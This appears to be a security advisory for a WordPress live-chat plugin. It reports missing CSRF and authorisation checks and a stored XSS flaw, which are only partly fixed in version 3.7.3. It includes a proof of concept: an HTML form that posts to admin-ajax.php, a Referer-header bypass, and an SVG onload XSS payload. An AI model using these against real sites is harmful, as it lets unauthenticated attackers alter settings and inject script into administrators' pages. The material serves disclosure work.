The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechat_email option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page.
CSRF and XSS fixed in 3.7.3, however the authorisation part added an is_admin() (which only check if the dashboard or admin panel is trying to be displayed) check. Author has been notified on July 2nd but hasn't responded or fixed the latter.
|Proof of Concept
Unauthenticated Option Reset:
Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="licenseNumber" value="42"/>
<input type="hidden" name="licenseEmail" value="whatever"/>
Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value by "><svg/onload=alert(/XSS/)>